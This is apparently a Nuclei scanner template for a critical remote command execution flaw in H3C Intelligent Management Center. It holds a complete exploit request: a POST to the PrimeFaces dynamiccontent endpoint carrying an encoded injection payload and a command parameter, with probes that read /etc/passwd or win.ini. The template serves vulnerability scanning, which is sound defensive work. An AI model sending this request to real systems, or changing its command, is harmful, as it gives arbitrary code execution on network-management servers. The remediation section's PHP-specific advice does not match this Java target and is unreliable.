id: h3c-imc-rce
info:
  name: H3c IMC RCE
  author:
  - l0ne1y
  description: |-
    H3C IMC command execution vulnerability
    The dynamiccontent.properties.xhtm endpoint of the H3C Intelligent Management Center (iMC) platform has a remote command execution vulnerability. An attacker can trigger remote command execution by crafting a special request.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users obtain the latest patch or latest version from the official website:
    https://www.h3c.com/cn/

    Temporary fix:
    1. Avoid executing external applications or commands where possible.
    2. Use custom functions or libraries to implement the functionality of external applications or commands.
    3. Validate input parameters before calling functions that execute commands, such as system and eval.
    4. Process related parameters with the escapeshellarg function. The escapeshellarg function escapes any characters that would terminate an argument or command: a single quote "'" becomes "\\'", a double quote "\"" becomes "\\\"", and a semicolon ";" becomes "\\;". This confines the argument content within a pair of single or double quotes, escaping any quotes within the argument so they cannot break out of the current execution, thereby preventing command injection attacks.
    5. Use safe_mode_exec_dir to restrict the executable file path. Set safe_mode to On in the php.ini file, place the allowed executable files in a directory, and use safe_mode_exec_dir to specify this executable path. When an external program needs to be executed, it will only be allowed to run if it is in the directory specified by safe_mode_exec_dir; otherwise execution will fail.
requests:
- matchers:
  - type: regex
    condition: or
    part: body
    regex:
    - 'root:.*:0:0:'
    - \[(font|extension|file)s\]
  - type: status
    status:
    - 200
  matchers-condition: and
  raw:
  - |
    POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/x-www-form-urlencoded

    pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd={{command}}
  payloads:
    command:
    - cat /etc/passwd
    - type C:\\Windows\\win.ini
  stop-at-first-match: true
